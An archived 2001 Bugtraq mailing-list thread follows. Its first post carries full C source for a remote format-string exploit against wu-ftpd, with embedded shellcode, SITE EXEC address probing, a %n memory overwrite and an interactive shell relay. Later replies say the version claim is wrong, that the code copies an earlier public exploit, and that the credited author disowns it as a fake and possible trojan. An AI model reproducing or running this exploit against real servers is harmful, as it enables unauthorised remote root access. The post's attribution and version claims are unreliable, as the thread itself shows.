6185791 2001-03-07 04:40 +0100  /283 rader/ Nomen Nescio <nobody@DIZUM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-07  21:56  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: nobody@DIZUM.COM
Mottagare: Bugtraq (import) <15805>
Ärende: wu-ftpd
------------------------------------------------------------
From: Nomen Nescio <nobody@DIZUM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <e01141c29072cd2bc40439162ba87800@dizum.com>

hi,

this is an exploit for wu-ftpd 2.6.1(1) on linux
propz to segv for giving this to me

bringin' you the 0day from the hackweiser crew, australian
+chapter

cya,
Till

----

/*
 * Linux wu-ftpd - 2.6.1(1)
 *
 * DiGiT
 */

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>

char linuxcode[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
  "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
  "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
  "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
  "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
  "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
  "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
  "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
  "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
  "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";


main (int argc, char *argv[])
{

  char cmdbuf[8192];
  char cbuf[1024];
  char *t;
  char nop[400];
  int pip, i, a = 22, st = 0;
  struct sockaddr_in sck;
  struct hostent *hp;
  long inet;
  int port = 21;
  fd_set fds;
  unsigned int aa;
  long reta, retb, tmp, retz;
  int ret;
  int add = 0;

  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  memset (cbuf, 0x0, sizeof (cbuf));
  memset (nop, 0x0, sizeof (nop));

  if (argc < 2)
    {
      fprintf (stderr, "Usage: %s [ip] \n", argv[0]);
      exit (-1);
    }

  pip = socket (PF_INET, SOCK_STREAM, 0);

  if (!pip)
    {
      perror ("socket()");
      exit (-1);
    }

  inet = inet_addr (argv[1]);
  if (inet == -1)
    {
      if (hp = gethostbyname (argv[1]))
        memcpy (&inet, hp->h_addr, 4);
      else
        inet = -1;
      if (inet == -1)
        {
          fprintf (stderr, "Cant resolv %s!! \n", argv[1]);
          exit (-1);
        }
    }
  sck.sin_family = PF_INET;
  sck.sin_port = htons (port);
  sck.sin_addr.s_addr = inet;

  if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)
    {
      perror ("Connect() ");
      exit (-1);
    }

  read (pip, cbuf, 1023);
  fprintf (stderr, "Connected to: %s \n", argv[1]);
  fprintf (stderr, "Banner: %s \n", cbuf);
  strcpy (cmdbuf, "user ftp\n");
  write (pip, cmdbuf, strlen (cmdbuf));
  memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);

  strcat (nop, linuxcode);

  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  sprintf (cmdbuf, "pass %s\n", nop);
  write (pip, cmdbuf, strlen (cmdbuf));
  sleep (1);
  read (pip, cmdbuf, sizeof (cmdbuf) - 1);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  if (!strncmp (cmdbuf, "530", 3))
    {
      printf ("loggin incorrect : %s \n", cmdbuf);
      exit (-1);
    }
  fprintf (stderr, "Logged in.. \n");
  fprintf (stderr, "+ Finding ret addresses \n");
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x\n");
  write (pip, cmdbuf, strlen (cmdbuf));
  sleep (1);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  read (pip, cmdbuf, sizeof (cmdbuf) - 1);
  if (!strncmp (cmdbuf + 4, "%x", 2))
    {
      fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s \n[0m",
               cmdbuf);
      exit (-1);
    }
  else
    {
      fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s \n[0m",
cmdbuf);
    }
  reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
  retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") +
11, 16);

  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  strcpy (cmdbuf, "SITE EXEC ");
  for (ret = 0; ret <= 88; ret++)
    {
      strcat (cmdbuf, "%x");
    }
  strcat (cmdbuf, "|%x\n");
  write (pip, cmdbuf, strlen (cmdbuf));
  sleep (1);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  read (pip, cmdbuf, sizeof (cmdbuf) - 1);
  retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") +
11, 16);
  printf ("Ret location befor: %x \n", reta);
  if (reta == 0)
    reta = retz;
  else
    add = 600;
  reta = reta - 0x58;
  retb = retb + 100 - 0x2569 - add;
  printf ("Ret      location : %x \n", reta);
  printf ("Proctitle addres  : %x and %u \n", retb, retb);
  sleep (2);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));

  sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
           (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
           (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
  a = 22;
  memset (cbuf, 0x0, sizeof (cbuf));
  while (1)
    {

      memset (cmdbuf, 0x0, sizeof (cmdbuf));

      sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
               (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
               (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
      for (i = 0; i <= 128; i++)
        strcat (cmdbuf, "%.f");
      for (i = 0; i <= a; i++)
        strcat (cmdbuf, "%d");
      sprintf (cbuf, "|%%x|%%x\n", aa + 9807 - 460);
      strcat (cmdbuf, cbuf);
      write (pip, cmdbuf, strlen (cmdbuf));
      memset (cmdbuf, 0x0, sizeof (cmdbuf));
      read (pip, cmdbuf, sizeof (cmdbuf) - 1);
      t = (char *) strstr (cmdbuf, "|");
      tmp = strtoul (t + 1, t + 11, 16);
      if (tmp != 0)
        {
          fprintf (stderr, "tmp 1  : 0x%x\n", tmp);
          if (tmp == reta)
            {
              fprintf (stderr, "Cached a : %d \n", a);
              st = 1;
              break;
            }
          tmp = strtoul (t + 11, t + 22, 16);
          fprintf (stderr, "tmp 2  : 0x%x\n", tmp);
          if (tmp == reta)
            {
              fprintf (stderr, "Cached a : %d \n", a);
              st = 2;
              break;
            }
        }
      if (st > 0)
        break;
      a++;
    }
  sleep (1);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  memset (cbuf, 0x0, sizeof (cbuf));

  sprintf (cmdbuf, "SITE EXEC
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c",
           (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,
           (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);
  for (i = 0; i <= 128; i++)
    strcat (cmdbuf, "%.f");
  if (add != 600)
    a = a - 1;
  fprintf (stderr, "Trying with : %d \n", a);
  for (i = 0; i <= a; i++)
    strcat (cmdbuf, "%d");

  aa = retb;
  if (add == 600)
    sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807);
  else
    sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807 - 480);

  strcat (cmdbuf, cbuf);
  write (pip, cmdbuf, strlen (cmdbuf));
  memset (cmdbuf, 0x0, sizeof (cmdbuf));
  read (pip, cmdbuf, sizeof (cmdbuf) - 1);
  memset (cmdbuf, 0x0, sizeof (cmdbuf));

  fprintf (stderr, "[1m[33m Wait for a shell.....\n[0m");


  while (1)
    {
      FD_ZERO (&fds);
      FD_SET (0, &fds);
      FD_SET (pip, &fds);
      select (255, &fds, NULL, NULL, NULL);
      if (FD_ISSET (pip, &fds))
        {
          memset (cbuf, 0x0, sizeof (cbuf));
          ret = read (pip, cbuf, sizeof (cbuf) - 1);
          if (ret <= 0)
            {
              printf ("Connection closed - EOF \n");
              exit (-1);
            }
          printf ("%s", cbuf);
        }
      if (FD_ISSET (0, &fds))
        {
          memset (cbuf, 0x0, sizeof (cbuf));
          read (0, cbuf, sizeof (cbuf) - 1);
          write (pip, cbuf, strlen (cbuf));
        }
    }
  close (pip);
}

_______________________________
The Proton
<proton@dshs.nsw.edu.au>
_______________________________
(6185791) ------------------------------------------
Kommentar i text 6186637 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Kommentar i text 6186670 av predator <preedator@SENDMAIL.RU>
6186670 2001-03-07 22:56 +0100  /32 rader/ predator <preedator@SENDMAIL.RU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08  02:35  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: preedator@SENDMAIL.RU
Mottagare: Bugtraq (import) <15811>
Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM>
Ärende: wu-ftpd
------------------------------------------------------------
From: predator <preedator@SENDMAIL.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AA6AE9B.A410DE70@sendmail.ru>

Nomen Nescio wrote:
>
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till
>
> ----
>
> /*
>  * Linux wu-ftpd - 2.6.1(1)
>  *
>  * DiGiT
>  */

Correct me if I'm wrong,but this is exploit for wu 2.6.0 not
2.6.1...This format string bug has been fixed in 2.6.1.

--
signoff predator
(6186670) ------------------------------------------

6186831 2001-03-07 22:55 +0100  /27 rader/ Jogchem de Groot <c.dgroot@CHELLO.NL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08  08:03  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: c.dgroot@CHELLO.NL
Mottagare: Bugtraq (import) <15815>
Ärende: Re: wu2.6.1 exploit
------------------------------------------------------------
From: Jogchem de Groot <c.dgroot@CHELLO.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01030722554001.00974@kryptology>

jogchem@kryptology:~$ diff wu2.6.1.c wu-lnx.c
jogchem@kryptology:~$

Exactly the same as the previously release wu-lnx.c exploit.
http://packetstorm.securify.com/0009-exploits/wu-lnx.c

kinda a hoax?? :)

On Wednesday 07 March 2001 04:40, you wrote:
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till

-------------------------------------------------------
(6186831) ------------------------------------------
6190826 2001-03-07 23:42 -0500  /58 rader/ John <johns@TAMPABAY.RR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-08  20:05  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: johns@TAMPABAY.RR.COM
Mottagare: Bugtraq (import) <15821>
Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM>
Ärende: Re: Wu 2.6.1 exploit
------------------------------------------------------------
From: John <johns@TAMPABAY.RR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3AA70DC8.82BF9B1A@tampabay.rr.com>

I just posted another messages to Bugtraq before I read a post
to Anti Security from DiGiT. His comments are below.

 digit
 07.03.01 22:32:22
 Subject: wu-ftpd fake on BUGTRAQ
 Action: REPLY, NEW.

 Before everyone starts flaming me or antisec about that post to
 BUGTRAQ about wu-ftpd 2.6.1 you must realize that I did not write
 that "exploit" which is on bugtraq. In fact anyone who closely
 inspects the "exploit"  will see that it is actually a fake
 exploit. However I cant say for sure wether it is a trojan.

 This might be an attempt to undermine my credibility with antisec? If
so,
 it would be an extremely cheap shot.

Nomen Nescio wrote:
>
> hi,
>
> this is an exploit for wu-ftpd 2.6.1(1) on linux
> propz to segv for giving this to me
>
> bringin' you the 0day from the hackweiser crew, australian
> +chapter
>
> cya,
> Till
>
> ----
>
> /*
>  * Linux wu-ftpd - 2.6.1(1)
>  *
>  * DiGiT
>  */
>
> _______________________________
> The Proton
> <proton@dshs.nsw.edu.au>
> _______________________________

--
The events which transpired five thousand years ago;
Five years ago or five minutes ago, have determined
what will happen five minutes from now; five years
From now or five thousand years from now.
All history is a current event."

- Dr John Henrik Clake -
(6190826) --------------------------------(Ombruten)